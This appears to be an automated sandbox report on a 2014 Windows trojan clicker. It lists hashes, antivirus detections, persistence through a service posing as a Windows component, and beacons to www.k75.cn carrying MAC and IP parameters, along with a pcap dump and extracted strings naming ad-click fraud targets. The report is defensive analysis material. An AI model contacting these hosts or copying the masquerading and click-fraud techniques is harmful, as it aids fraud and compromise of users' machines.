Analysis Date | 2014-10-10 19:01:42 |
---|---|
MD5 | bc75e5c03e200ddf6fc657de71a9b744 |
SHA1 | ef68844bafc720db44631adceb884536e1d42a6d |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 8ba5adc7a003ad956f866b2a6ae8fa4d sha1: 9db343e7aef2805776f52fd4130bbffccca4e1dd size: 33001 | |
Section | .data md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 | |
Section | .rsrc md5: fb18b0a66157d9bd4f185e594e10b3ed sha1: eaad39fca71766a4543cf7d9f29a1896df49526c size: 153993 | |
Timestamp | 2009-09-28 13:54:18 | |
Version | InternalName: wmiprsve FileVersion: 1.00 CompanyName: Microsoft Corporation ProductName: Microsoft(R) Windows(R) Operating System ProductVersion: 1.00 OriginalFilename: wmiprsve.exe | |
Packer | AHTeam EP Protector 0.3 (fake PCGuard 4.03-4.15) -> FEUERRADER | |
PEhash | f79e77d90c068923e550d1ee1c36a6173e7903c4 | |
IMPhash | 07bc5ebd01e0903e4b2020f5c61217f0 | |
AV | 360 Safe | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Ad-Aware | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Alwil (avast) | Malware-gen:Win32:Malware-gen |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Risk.CYPY-5897 |
AV | Avira (antivir) | TR/Spy.Gen |
AV | BullGuard | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | no_virus |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.Click.37051 |
AV | Emsisoft | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Eset (nod32) | Win32/VB.ORT |
AV | Fortinet | Malware_fam.A |
AV | Frisk (f-prot) | W32/MalwareS.BAPO |
AV | F-Secure | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Grisoft (avg) | Dropper.Generic3.BIRV |
AV | Ikarus | Trojan-Clicker.Win32.VB |
AV | K7 | Trojan ( 0001140e1 ) |
AV | Kaspersky | Trojan.Win32.Generic:Trojan-Clicker.Win32.VB.ddu |
AV | MalwareBytes | no_virus |
AV | Mcafee | RDN/Generic Dropper!vi |
AV | Microsoft Security Essentials | Trojan:Win32/Provis!rts |
AV | MicroWorld (escan) | Gen:Trojan.Heur.GZ.lm0@bWyQNkdl |
AV | Norman | win32:win32/SB/Obfuscated_FA |
AV | Rising | no_virus |
AV | Sophos | Mal/Behav-210 |
AV | Symantec | Trojan Horse |
AV | Trend Micro | no_virus |
AV | VirusBlokAda (vba32) | TrojanClicker.VB |
AV | Yara APT | no_virus |
AV | Zillya! | Dropper.VB.Win32.20245 |
Runtime Details:
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
---|---|
Creates File | PIPE\wkssvc |
Creates File | C:\WINDOWS\system32\malware.exe |
Creates File | C:\WINDOWS\system32\syswindows.ini |
Creates Process | "C:\WINDOWS\system32\malware.exe" |
Process
↳ "C:\WINDOWS\system32\malware.exe"
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | PIPE\wkssvc |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | \Device\Netbios |
Creates File | C:\WINDOWS\system32\spoolsrv.exe |
Deletes File | C:\\malware.exe |
Deletes File | C:\WINDOWS\system32\syswindows.ini |
Creates Process | "C:\WINDOWS\system32\spoolsrv.exe" |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Creates Service | Windows Workstation System - C:\WINDOWS\system32\wmiprsve.exe |
Winsock DNS | www.k75.cn |
Process
↳ Pid 800
Process
↳ Pid 848
Process
↳ C:\WINDOWS\System32\svchost.exe
Creates File | C:\WINDOWS\system32\WBEM\Logs\wbemess.log |
---|---|
Process
↳ Pid 1108
Process
↳ Pid 1204
Process
↳ C:\WINDOWS\system32\spoolsv.exe
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL |
---|---|
Registry | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7 |
Registry | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL |
Registry | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00 |
Process
↳ Pid 1840
Process
↳ Pid 1140
Process
↳ "C:\WINDOWS\system32\spoolsrv.exe"
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\~DFFC48.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Netbios |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\ip138[1].htm |
Network Details:
DNS | cname.huatian.net Type: A 74.207.247.129 |
---|---|
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.19 |
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.20 |
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.21 |
DNS | yd.ecoma.glb0.lxdns.com Type: A 14.17.101.18 |
DNS | www.ip138.cn Type: A 218.133.22.66 |
DNS | www.k75.cn Type: A |
DNS | www.ip138.com Type: A |
HTTP GET | http://www.k75.cn/Count.aspx?mac=00-00-00-00-00-00 User-Agent: MyAgent |
HTTP GET | http://www.ip138.com/ips.asp User-Agent: MyAgent |
HTTP GET | http://www.ip138.cn/ User-Agent: MyAgent |
HTTP GET | http://www.k75.cn/Version.txt User-Agent: MyAgent |
HTTP GET | http://www.k75.cn/GetDate.aspx?ip=127.0.0.1&mac=00-00-00-00-00-00&ver=1.0.0 User-Agent: MyAgent |
Flows TCP | 192.168.1.1:1032 ➝ 74.207.247.129:80 |
Flows TCP | 192.168.1.1:1033 ➝ 14.17.101.19:80 |
Flows TCP | 192.168.1.1:1034 ➝ 218.133.22.66:80 |
Flows TCP | 192.168.1.1:1035 ➝ 74.207.247.129:80 |
Flows TCP | 192.168.1.1:1036 ➝ 74.207.247.129:80 |
Raw Pcap
```
0x00000000 (00000) 47455420 2f436f75 6e742e61 7370783f GET /Count.aspx?
0x00000010 (00016) 6d61633d 30302d30 302d3030 2d30302d mac=00-00-00-00-
0x00000020 (00032) 30302d30 30204854 54502f31 2e310d0a 00-00 HTTP/1.1..
0x00000030 (00048) 55736572 2d416765 6e743a20 4d794167 User-Agent: MyAg
0x00000040 (00064) 656e740d 0a486f73 743a2077 77772e6b ent..Host: www.k
0x00000050 (00080) 37352e63 6e0d0a43 6f6e7465 6e742d4c 75.cn..Content-L
0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache
0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac
0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00-
0x00000090 (00144) 30302d30 302d3030 2d3030            00-00-00-00

0x00000000 (00000) 47455420 2f697073 2e617370 20485454 GET /ips.asp HTT
0x00000010 (00016) 502f312e 310d0a55 7365722d 4167656e P/1.1..User-Agen
0x00000020 (00032) 743a204d 79416765 6e740d0a 486f7374 t: MyAgent..Host
0x00000030 (00048) 3a207777 772e6970 3133382e 636f6d0d : www.ip138.com.
0x00000040 (00064) 0a436163 68652d43 6f6e7472 6f6c3a20 .Cache-Control:
0x00000050 (00080) 6e6f2d63 61636865 0d0a0d0a 6e742d4c no-cache....nt-L
0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache
0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac
0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00-
0x00000090 (00144) 30302d30 302d3030 2d3030            00-00-00-00

0x00000000 (00000) 47455420 2f204854 54502f31 2e310d0a GET / HTTP/1.1..
0x00000010 (00016) 55736572 2d416765 6e743a20 4d794167 User-Agent: MyAg
0x00000020 (00032) 656e740d 0a486f73 743a2077 77772e69 ent..Host: www.i
0x00000030 (00048) 70313338 2e636e0d 0a436163 68652d43 p138.cn..Cache-C
0x00000040 (00064) 6f6e7472 6f6c3a20 6e6f2d63 61636865 ontrol: no-cache
0x00000050 (00080) 0d0a0d0a 61636865 0d0a0d0a 6e742d4c ....ache....nt-L
0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache
0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac
0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00-
0x00000090 (00144) 30302d30 302d3030 2d3030            00-00-00-00

0x00000000 (00000) 47455420 2f566572 73696f6e 2e747874 GET /Version.txt
0x00000010 (00016) 20485454 502f312e 310d0a55 7365722d  HTTP/1.1..User-
0x00000020 (00032) 4167656e 743a204d 79416765 6e740d0a Agent: MyAgent..
0x00000030 (00048) 486f7374 3a207777 772e6b37 352e636e Host: www.k75.cn
0x00000040 (00064) 0d0a4361 6368652d 436f6e74 726f6c3a ..Cache-Control:
0x00000050 (00080) 206e6f2d 63616368 650d0a0d 0a742d4c  no-cache....t-L
0x00000060 (00096) 656e6774 683a2032 310d0a43 61636865 ength: 21..Cache
0x00000070 (00112) 2d436f6e 74726f6c 3a206e6f 2d636163 -Control: no-cac
0x00000080 (00128) 68650d0a 0d0a6d61 633d3030 2d30302d he....mac=00-00-
0x00000090 (00144) 30302d30 302d3030 2d3030            00-00-00-00

0x00000000 (00000) 47455420 2f476574 44617465 2e617370 GET /GetDate.asp
0x00000010 (00016) 783f6970 3d313237 2e302e30 2e31266d x?ip=127.0.0.1&m
0x00000020 (00032) 61633d30 302d3030 2d30302d 30302d30 ac=00-00-00-00-0
0x00000030 (00048) 302d3030 26766572 3d312e30 2e302048 0-00&ver=1.0.0 H
0x00000040 (00064) 5454502f 312e310d 0a557365 722d4167 TTP/1.1..User-Ag
0x00000050 (00080) 656e743a 204d7941 67656e74 0d0a486f ent: MyAgent..Ho
0x00000060 (00096) 73743a20 7777772e 6b37352e 636e0d0a st: www.k75.cn..
0x00000070 (00112) 436f6e74 656e742d 4c656e67 74683a20 Content-Length: 
0x00000080 (00128) 34340d0a 43616368 652d436f 6e74726f 44..Cache-Contro
0x00000090 (00144) 6c3a206e 6f2d6361 6368650d 0a0d0a69 l: no-cache....i
0x000000a0 (00160) 703d3132 372e302e 302e3126 6d61633d p=127.0.0.1&mac=
0x000000b0 (00176) 30302d30 302d3030 2d30302d 30302d30 00-00-00-00-00-0
0x000000c0 (00192) 30267665 723d312e 302e30            0&ver=1.0.0
```
Strings
```
[$$] \*.* 00-00-00-00-00-00 080404B0 1.00 127.0.0.1 127.0.0.1| 51.la @\90\DTS\Binn\;D: 90\Too 99.99.99 about:blank /aclk?sa= alimamaclick alinkalink baiduclick baidusearch _blank body <br> <br><br> <br/><br/></td> classname Click &clickid= CloseTab_Error cnzz.com CompanyName continue Count.aspx? /count.html CUSTOM divgoogleclick divgooglesearch <div id="divalinkalink"><a id="alinkalink" href= Document DocumentComplete_Error dows\Curren ;D:\Prog EnLiveDownConfig.txt .exe execScript Explorer.ini False FileName FileVersion Form_Load_Error GetDate.aspx? GetDateUpdate.aspx? GetUrlKeyWord_Error google googleads.g.doubleclick.net/pagead/ads? googleads.g.doubleclick.net/pagead/sdo? googlebaiduservices googleclick googlesearch G:\VBServiceIEBr href http:// HTTP/1.1 iexplore.exe InnerHtml innerText INPUT InternalName &ip= ips.asp @isual Studio\VB98\C2.EXE.M javascript &jjclick= @jjj LegalTrademarks Length live800.com liveupdate.8866.org LocalSystem &mac= mac= MainStar_Error Microsoft Corporation Microsoft(R) Microsoft(R) Windows(R) Operating System MyAgent name Name > </a></div> NewTab NewWindow2 offsetLeft offsetParent offsetTop OldPathFile Open OriginalFilename otherclick outerHTML parentWindow ProductName ProductVersion &ptclick= &ptclicknub= qq.com quit .rar rosoft\Win /search?
SelectBrowserTab SelectBrowserTabRefresh_Error ServiceName &siteid= @s\Micros Software\Mic spoolsrv spoolsrv.exe StarLoad_Error StringFileInfo submit System Workstation System Event Service syswindows.ini tagName tags Target tencent: Translation true True tVersion\R &type= Type username= Value VarFileInfo &ver= Version.txt VS_VERSION_INFO @vXPEN\DeleteCookies.OBJ" -QIfd window.alert=null; WindowsUpdate.exe WindowsUpdate.rar Windows Workstation Windows Workstation System wmiprsve wmiprsve.exe www.google www.ip138.cn www.ip138.com www.k75.cn .zip 0-0000- 0W@W/f -2_cb`bbb^(- ^/3IKNKH7"!W 4>-L2^3 6,L->;- 6&vb6chs.dll _adj_fdiv_m16i _adj_fdiv_m32 _adj_fdiv_m32i _adj_fdiv_m64 _adj_fdiv_r _adj_fdivr_m16i _adj_fdivr_m32 _adj_fdivr_m32i _adj_fdivr_m64 _adj_fpatan _adj_fprem _adj_fprem1 _adj_fptan advapi32 advapi32.dll ADVAPI32.DLL _allmul brwWebBrowser ChangeServiceConfig2W _CIatan _CIcos _CIexp _CIlog _CIsin _CIsqrt _CItan ClientToScreen CloseHandle CloseServiceHandle CloseTab ControlService CreateEventW CreateServiceW CreateThread CreateToolhelp32Snapshot `.data DeleteAllTabs DeleteCookies DeleteFileA DeleteService DeleteTabsNub DeleteTabsNubArr DeleteTempInteFile DeleteUrlCacheEntryA DelIniKey DelIniSec DllFunctionCall D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB dRsjWSs dRs&rRs Ds6nTs ,DUUD, D:\WINDOWS\system32\ieframe.oca D:\WINDOWS\system32\msvbvm60.dll\3 EVENT_SINK_AddRef EVENT_SINK_QueryInterface EVENT_SINK_Release FindCloseUrlCache FindFirstUrlCacheEntryA FindNextUrlCacheEntryA FindProcess FindWindowA frmBrowser \G{000iexpIore *g~b0R G^cbZ8 GetCursorPos GetIniKey GetPrivateProfileStringA GetProcessHeap GetSystemDirectoryA GetTickCount GetUrlKeyWord GetVersionExA GetWindowLongA googlebaiduservices HeapAlloc HeapFree HttpOpenRequestA HttpSendRequestA ieframe.dll iexpIore IniFile INIFileName InternetCloseHandle InternetConnectA InternetOpenA InternetReadFile intNub jdh4>@ j|h(,@ j@h`>@ j\h4>@ jhh(,@ jPh(,@ jXh(,@ jXh|5@ kernel32 KERNEL32.DLL keybd_event
KeyWord kTs^bRs l~b0RD LocalAlloc LocalFree lstrcpyA lstrcpyW lstrlenA lstrlenW MainStar MapVirtualKeyA MessageBoxA mouse_event MoveFileExA MsgWaitForMultipleObjects MSVBVM60.DLL N,`beggfedZ[#N netapi32.dll Netbios New_IniPath NewTab NTService NTServiceControl nubarr nygJcoj OpenProcess OpenSCManagerW OpenServiceW `OS_MR O\U^PW Process32First Process32Next PsD~Ss Qs|5Ds Qs|5DsO QsA^Rs QsA^RsZ Qs^bRs Qsb>Rsi QsdjRsk Qs{eRs Qs.kTsL QsqbRs QsqbRs@ QsqOQs Qs:_Rs QsU#Qs QueryServiceConfigW QueryServiceStatus ReadyState RegCloseKey RegisterServiceCtrlHandlerW RegisterWindowMessageA RegOpenKeyA RegQueryValueExA RegSetValueExA ?Rsb>Rsi Rs{eRs Rs.kTs Rsq:Ts Rs__Rs <Rs[rSs= RsSuTsQhRs RtlMoveMemory ScreenToClient SectionName SelectBrowserTab SelectBrowserTabRefresh SetCursorPos SetEvent SetForegroundWindow SetLayeredWindowAttributes SetServiceStatus SetWindowLongA SetWindowPos SHDocVwCtl SHDocVwCtl.WebBrowser shell32.dll ShellExecuteA shfolder.dll SHGetFolderPathA ShowErrorMessageBox ShowWindow spoolsrv SsbcRs StarLoad StarMain StartServiceCtrlDispatcherW StartServiceW strKey strSection strValue TerminateProcess !This program cannot be run in DOS mode.
timeGetTime Timer1 Timer2 Timer3 Ts0LRs Ts__Rs URLDownloadToFileA urlmon user32 VBA6.DLL __vbaAryConstruct2 __vbaAryCopy __vbaAryDestruct __vbaAryLock __vbaAryMove __vbaAryUnlock __vbaAryVar __vbaBoolVar __vbaBoolVarNull __vbaCastObj __vbaChkstk __vbaCopyBytes __vbaDateVar __vbaEnd __vbaErrorOverflow __vbaExceptHandler __vbaExitProc __vbaFileClose __vbaFileOpen __vbaFPException __vbaFpI4 __vbaFPInt __vbaFpR8 __vbaFreeObj __vbaFreeObjList __vbaFreeStr __vbaFreeStrList __vbaFreeVar __vbaFreeVarList __vbaGenerateBoundsError __vbaHresultCheckObj __vbaI2I4 __vbaI2Var __vbaI4Var __vbaInStr __vbaInStrVar __vbaLateIdCall __vbaLateIdCallLd __vbaLateIdSt __vbaLateMemCall __vbaLateMemCallLd __vbaLateMemSt __vbaLenBstr __vbaLsetFixstr __vbaNew2 __vbaObjIs __vbaObjSet __vbaObjSetAddref __vbaObjVar __vbaOnError __vbaPutOwner3 __vbaR4Var __vbaRecAnsiToUni __vbaRecDestruct __vbaRecDestructAnsi __vbaRecUniToAnsi __vbaRedim __vbaRedimPreserve __vbaRefVarAry __vbaSetSystemError __vbaStrCat __vbaStrCmp __vbaStrCopy __vbaStrFixstr __vbaStrI2 __vbaStrI4 __vbaStrMove __vbaStrToAnsi __vbaStrToUnicode __vbaStrVarCopy __vbaStrVarMove __vbaStrVarVal __vbaUbound __vbaUI1I2 __vbaUI1I4 __vbaVar2Vec __vbaVarAdd __vbaVarAnd __vbaVarCat __vbaVarCmpEq __vbaVarCmpGt __vbaVarCmpLt __vbaVarCmpNe __vbaVarCopy __vbaVarDup __vbaVarForInit __vbaVarForNext __vbaVarIndexLoad __vbaVarLateMemCallLd __vbaVarLateMemCallLdRf __vbaVarLateMemSt __vbaVarMove __vbaVarNot __vbaVarOr __vbaVarSetVar __vbaVarSub __vbaVarTstEq __vbaVarTstGe __vbaVarTstGt __vbaVarTstLe __vbaVarTstLt __vbaVarTstNe __vbaVarVargNofree WaitForSingleObject WebBrowser wininet wininet.dll winIogon winmm.dll wmiprsve WriteIniKey WritePrivateProfileStringA YFh*jPW
```